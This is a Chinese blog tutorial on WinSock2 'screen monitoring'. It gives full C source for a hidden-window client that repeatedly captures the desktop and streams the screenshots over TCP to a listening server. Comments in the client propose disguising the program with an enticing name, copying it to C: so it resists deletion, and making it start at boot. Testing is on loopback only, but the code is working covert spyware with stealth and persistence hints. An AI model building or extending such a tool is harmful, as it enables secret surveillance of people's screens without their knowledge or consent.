

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="HY Yan">
  <meta name="keywords" content="">
  
    <meta name="description" content="本文章通过WinSock2库完成服务器端对客户端的实时屏幕获取。 主要思路就是通过TCP网络连接，客户端实时抓取屏幕保存在本地并发送给服务器端。">
<meta property="og:type" content="article">
<meta property="og:title" content="网络编程 WinSock2完成屏幕监控">
<meta property="og:url" content="http://example.com/2022/07/12/%E7%BD%91%E7%BB%9C%E7%BC%96%E7%A8%8B-WinSock2%E5%AE%8C%E6%88%90%E5%B1%8F%E5%B9%95%E7%9B%91%E6%8E%A7/index.html">
<meta property="og:site_name" content="LE PARADIS">
<meta property="og:description" content="本文章通过WinSock2库完成服务器端对客户端的实时屏幕获取。 主要思路就是通过TCP网络连接，客户端实时抓取屏幕保存在本地并发送给服务器端。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://i0.hdslb.com/bfs/album/c0c5cf1712c92fa840092d869d8fc5ecd999e123.png">
<meta property="og:image" content="https://i0.hdslb.com/bfs/album/6d5c2e943307670d858af8cacecdab2ae5263dc2.png">
<meta property="og:image" content="https://i0.hdslb.com/bfs/album/463b3302a856960345a95e5a74ad5d7923bfcb11.png">
<meta property="og:image" content="https://i0.hdslb.com/bfs/album/fc626417bf0e93762874f5e287ac4d77f9b9f5c8.png">
<meta property="og:image" content="https://i0.hdslb.com/bfs/album/e6d0a3c9dad5270fa9a6f321a8110fc8472c76d7.png">
<meta property="og:image" content="https://i0.hdslb.com/bfs/album/920959aaa6500b048cfd58f4bfa524aa1c64e408.png">
<meta property="og:image" content="https://i0.hdslb.com/bfs/album/6ce086f9020395198c6c0580d8fb7d825109eb5d.png">
<meta property="og:image" content="https://i0.hdslb.com/bfs/album/960aa4a8bf8f5e3c18f809f77583cbb956b68502.png">
<meta property="article:published_time" content="2022-07-12T09:38:48.000Z">
<meta property="article:modified_time" content="2022-07-12T10:28:52.536Z">
<meta property="article:author" content="HY Yan">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://i0.hdslb.com/bfs/album/c0c5cf1712c92fa840092d869d8fc5ecd999e123.png">
  
  
  
  <title>网络编程 WinSock2完成屏幕监控 - LE PARADIS</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.4","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.2.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Fluid</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="网络编程 WinSock2完成屏幕监控"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2022-07-12 17:38" pubdate>
          2022年7月12日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          3.6k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          31 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">网络编程 WinSock2完成屏幕监控</h1>
            
            
              <div class="markdown-body">
                
                <p>本文章通过WinSock2库完成服务器端对客户端的实时屏幕获取。</p>
<p>主要思路就是通过TCP网络连接，客户端实时抓取屏幕保存在本地并发送给服务器端。</p>
<span id="more"></span>

<h2 id="一、程序测试："><a href="#一、程序测试：" class="headerlink" title="一、程序测试："></a>一、程序测试：</h2><p>仅在本机回环地址127.0.0.1测试。</p>
<p><img src="https://i0.hdslb.com/bfs/album/c0c5cf1712c92fa840092d869d8fc5ecd999e123.png" srcset="/img/loading.gif" lazyload></p>
<p>被监控端打开client.exe（看不到反应，因为隐藏了窗口，但程序已经运行）。</p>
<p>之后监控端打开service.exe程序。</p>
<img src="https://i0.hdslb.com/bfs/album/6d5c2e943307670d858af8cacecdab2ae5263dc2.png" srcset="/img/loading.gif" lazyload style="zoom: 25%;" />

<p>会出现一个窗口，窗口内就是被监控端的电脑屏幕（这里直接是我本机画面），按空格键停止监控，client还在后台运行，用任务管理器关闭。</p>
<img src="https://i0.hdslb.com/bfs/album/463b3302a856960345a95e5a74ad5d7923bfcb11.png" srcset="/img/loading.gif" lazyload style="zoom:50%;" />

<!--more-->

<h2 id="二、环境配置："><a href="#二、环境配置：" class="headerlink" title="二、环境配置："></a>二、环境配置：</h2><p>本代码在VS2019下编写</p>
<img src="https://i0.hdslb.com/bfs/album/fc626417bf0e93762874f5e287ac4d77f9b9f5c8.png" srcset="/img/loading.gif" lazyload style="zoom:50%;" />

<p>需要打开两个新项目client和service，分别是客户端和服务器端。</p>
<p>需要调整属性，项目→属性。</p>
<img src="https://i0.hdslb.com/bfs/album/e6d0a3c9dad5270fa9a6f321a8110fc8472c76d7.png" srcset="/img/loading.gif" lazyload style="zoom:50%;" />

<img src="https://i0.hdslb.com/bfs/album/920959aaa6500b048cfd58f4bfa524aa1c64e408.png" srcset="/img/loading.gif" lazyload style="zoom:50%;" />

<img src="https://i0.hdslb.com/bfs/album/6ce086f9020395198c6c0580d8fb7d825109eb5d.png" srcset="/img/loading.gif" lazyload style="zoom:50%;" />

<p>将这三个调为图上的配置。</p>
<img src="https://i0.hdslb.com/bfs/album/960aa4a8bf8f5e3c18f809f77583cbb956b68502.png" srcset="/img/loading.gif" lazyload style="zoom: 67%;" />

<p>此处是Debug x64。</p>
<h2 id="三、代码："><a href="#三、代码：" class="headerlink" title="三、代码："></a>三、代码：</h2><h3 id="被监控端-x2F-client端："><a href="#被监控端-x2F-client端：" class="headerlink" title="被监控端&#x2F;client端："></a>被监控端&#x2F;client端：</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br></pre></td><td class="code"><pre><span class="line">#include&lt;stdio.h&gt;</span><br><span class="line">#include&lt;WinSock2.h&gt;</span><br><span class="line">#include&lt;easyx.h&gt;</span><br><span class="line">#pragma comment(linker, &quot;/subsystem:\&quot;windows\&quot; /entry:\&quot;mainCRTStartup\&quot;&quot;)</span><br><span class="line">#pragma comment(lib,&quot;ws2_32.lib&quot;)</span><br><span class="line">//被监控端</span><br><span class="line">int main()</span><br><span class="line">&#123;</span><br><span class="line">	//按需求可以继续优化以下内容</span><br><span class="line">	//将程序名设置为容易被人打开的</span><br><span class="line">	//防删除，拷贝一份，拷贝到C盘</span><br><span class="line">	//开机自启</span><br><span class="line"></span><br><span class="line">	while (1) &#123;</span><br><span class="line">		//初始化网络资源</span><br><span class="line">		WSADATA wsaData;</span><br><span class="line">		WSAStartup(MAKEWORD(2, 2), &amp;wsaData);</span><br><span class="line"></span><br><span class="line">		////搭建socket网络传输TCP</span><br><span class="line">		SOCKET hsock = socket(AF_INET, SOCK_STREAM, 0);//IPv4</span><br><span class="line">		SOCKADDR_IN servAdr;</span><br><span class="line">		servAdr.sin_family = AF_INET;</span><br><span class="line">		servAdr.sin_addr.s_addr = inet_addr(&quot;127.0.0.1&quot;);//本机回环地址</span><br><span class="line">		servAdr.sin_port = htons(7777);</span><br><span class="line"></span><br><span class="line">		while(connect(hsock, (SOCKADDR*)&amp;servAdr, sizeof(servAdr))==SOCKET_ERROR);</span><br><span class="line"></span><br><span class="line">		//获取桌面图像的准备工作</span><br><span class="line">		int CX = GetSystemMetrics(SM_CXSCREEN);//水平分辨率</span><br><span class="line">		int CY = GetSystemMetrics(SM_CYSCREEN);//垂直分辨率</span><br><span class="line">		//CX = CX * 1.25; CY = CY * 1.25;</span><br><span class="line">		IMAGE image(CX, CY);//定义一张图片，大小和桌面一样大</span><br><span class="line">		HDC dc, imageDC;//设备上下文</span><br><span class="line">		char buf[1024] = &#123; 0 &#125;;//发送数据的内存</span><br><span class="line">		FILE* fp;//文件</span><br><span class="line">		while (1)</span><br><span class="line">		&#123;</span><br><span class="line">			//获取一帧</span><br><span class="line">			dc = CreateDC(&quot;DISPLAY&quot;, 0, 0, 0);//桌面图像</span><br><span class="line">			imageDC = GetImageHDC(&amp;image);</span><br><span class="line">			//桌面的图像---&gt;image的图像</span><br><span class="line">			BitBlt(imageDC, 0, 0, CX, CY, dc, 0, 0, SRCCOPY);</span><br><span class="line">			saveimage(&quot;C:\\Users\\Public\\Pictures\\screenshot.jpg&quot;, &amp;image);</span><br><span class="line"></span><br><span class="line">			//发送一帧</span><br><span class="line">			//打开图片文件</span><br><span class="line">			fp = fopen(&quot;C:\\Users\\Public\\Pictures\\screenshot.jpg&quot;, &quot;rb&quot;);</span><br><span class="line">			//计算图片大小</span><br><span class="line">			fseek(fp, 0, SEEK_END);//光标移动到最后</span><br><span class="line">			int allbytes = ftell(fp);//返回从文件头到当前光标字节大写</span><br><span class="line">			fseek(fp, 0, SEEK_SET);</span><br><span class="line">			//发文件大小</span><br><span class="line">			send(hsock, (const char*)&amp;allbytes, sizeof(allbytes),0);</span><br><span class="line">			//文件发过去</span><br><span class="line">			int bytes;</span><br><span class="line">			while ((bytes = fread(buf, 1, 1024, fp)) &gt; 0)</span><br><span class="line">				send(hsock, buf, bytes, 0);</span><br><span class="line">			fclose(fp);</span><br><span class="line"></span><br><span class="line">			//接收-1不发</span><br><span class="line"></span><br><span class="line">			//接收1 继续发</span><br><span class="line">			int n = 0;</span><br><span class="line">			recv(hsock, (char*)&amp;n, 4, 0);</span><br><span class="line">			if (n != 1)</span><br><span class="line">				break;</span><br><span class="line">		&#125;</span><br><span class="line">		closesocket(hsock);</span><br><span class="line">		</span><br><span class="line">		//清理网络资源</span><br><span class="line">		WSACleanup();</span><br><span class="line">	&#125;</span><br><span class="line">	return 0;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="监控端-x2F-service端："><a href="#监控端-x2F-service端：" class="headerlink" title="监控端&#x2F;service端："></a>监控端&#x2F;service端：</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br></pre></td><td class="code"><pre><span class="line">#include&lt;stdio.h&gt;</span><br><span class="line">#include&lt;WinSock2.h&gt;//网络头文件</span><br><span class="line">#include&lt;easyx.h&gt;</span><br><span class="line">#pragma comment(lib,&quot;ws2_32.lib&quot;)//网络库文件</span><br><span class="line">int main()</span><br><span class="line">&#123;</span><br><span class="line">	//初始化网络资源</span><br><span class="line">	WSADATA wsaData;</span><br><span class="line">	WSAStartup(MAKEWORD(2, 2), &amp;wsaData);</span><br><span class="line"></span><br><span class="line">	//搭建socket网络传输TCP</span><br><span class="line">	SOCKET hServSock = socket(AF_INET, SOCK_STREAM, 0);//IPv4</span><br><span class="line">	SOCKADDR_IN servAdr;</span><br><span class="line">	servAdr.sin_family = AF_INET;</span><br><span class="line">	servAdr.sin_addr.s_addr = htonl(INADDR_ANY);//使用服务器地址</span><br><span class="line">	servAdr.sin_port = htons(7777);</span><br><span class="line">	bind(hServSock, (SOCKADDR*)&amp;servAdr, sizeof(servAdr));</span><br><span class="line">	listen(hServSock, 5);//监听</span><br><span class="line"></span><br><span class="line">	SOCKADDR_IN clntAdr;</span><br><span class="line">	int clntAdrSz = sizeof(clntAdr);</span><br><span class="line">	SOCKET hsock = accept(hServSock, (SOCKADDR*)&amp;clntAdr, &amp;clntAdrSz);</span><br><span class="line"></span><br><span class="line">	printf(&quot;已经连接！&quot;);</span><br><span class="line"></span><br><span class="line">	//创建一个窗口</span><br><span class="line">	initgraph(1280, 720, EW_NOCLOSE);</span><br><span class="line">	FILE* fp;</span><br><span class="line">	char buf[1024] = &#123; 0 &#125;;</span><br><span class="line">	while (1)</span><br><span class="line">	&#123;</span><br><span class="line">		//接收文件的数据大小</span><br><span class="line">		int allbytes = 0;</span><br><span class="line">		recv(hsock, (char*)&amp;allbytes, sizeof(allbytes), 0);</span><br><span class="line"></span><br><span class="line">		//创建文件 接收</span><br><span class="line">		fp = fopen(&quot;1.jpg&quot;, &quot;wb&quot;);</span><br><span class="line">		int bytes, sum = 0;</span><br><span class="line">		while ((bytes = recv(hsock, buf, 1024, 0)) &gt; 0)</span><br><span class="line">		&#123;</span><br><span class="line">			fwrite(buf, 1, bytes, fp);</span><br><span class="line">			sum += bytes;</span><br><span class="line">			if (sum &gt;= allbytes)</span><br><span class="line">				break;</span><br><span class="line">		&#125;</span><br><span class="line">		fclose(fp);</span><br><span class="line"></span><br><span class="line">		loadimage(NULL, &quot;1.jpg&quot;, 1280, 720);</span><br><span class="line"></span><br><span class="line">		if (GetAsyncKeyState(VK_SPACE))</span><br><span class="line">		&#123;</span><br><span class="line">			int n = -1;//退出了</span><br><span class="line">			send(hsock, (const char*)&amp;n, 4, 0);</span><br><span class="line">			closegraph();</span><br><span class="line">			break;</span><br><span class="line">		&#125;</span><br><span class="line">		else</span><br><span class="line">		&#123;</span><br><span class="line">			int n = 1;</span><br><span class="line">			send(hsock, (const char*)&amp;n, 4, 0);</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">	//清理网络资源</span><br><span class="line">	WSACleanup();</span><br><span class="line">	return 0;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="四、可能遇到的问题："><a href="#四、可能遇到的问题：" class="headerlink" title="四、可能遇到的问题："></a>四、可能遇到的问题：</h2><ol>
<li><p>1.&lt;easyx.h&gt;头文件没有，可以在网上下载这个库。</p>
</li>
<li><p>2.代码标红出错，配置没有调对。</p>
</li>
<li><p>3.屏幕尺寸不对，可以通过修改代码调试，如果抓取的屏幕不完整，可能是被抓取的屏幕没有按照100％显示。</p>
</li>
<li><p>4.有关路径按自身电脑配置。</p>
</li>
<li><p>5.最后生成解决方案后可以到Debug问下下找到.exe文件。</p>
</li>
</ol>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>网络编程 WinSock2完成屏幕监控</div>
      <div>http://example.com/2022/07/12/网络编程-WinSock2完成屏幕监控/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>HY Yan</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2022年7月12日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2023/01/24/%E5%8D%9A%E5%AE%A2%E6%93%8D%E4%BD%9C%E6%8C%87%E5%8D%97/" title="博客操作指南">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">博客操作指南</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/06/24/%E6%95%B0%E5%AD%97%E7%AD%BE%E5%90%8D/" title="数字签名">
                        <span class="hidden-mobile">数字签名</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
